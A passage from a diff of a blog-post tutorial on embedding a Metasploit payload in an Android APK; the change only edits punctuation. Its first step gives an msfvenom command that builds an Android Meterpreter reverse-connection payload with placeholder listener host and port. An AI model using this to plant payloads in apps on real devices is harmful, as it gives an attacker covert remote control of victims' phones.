skulltech/sumit-ghosh.com/_posts/2015-12-19-embed-metasploit-payload-in-apk-manually.md

 ### Step 1: Generate the Payload

 First of all, we have to make the Meterpreter payload.
 We are going to use MSFVenom for this.
-The command is-
+The command is
 ```console
 $ msfvenom -p android/meterpreter/[Payload_Type] LHOST=[IP_Address] LPORT=[Incoming_Port] -o meterpreter.apk
 ```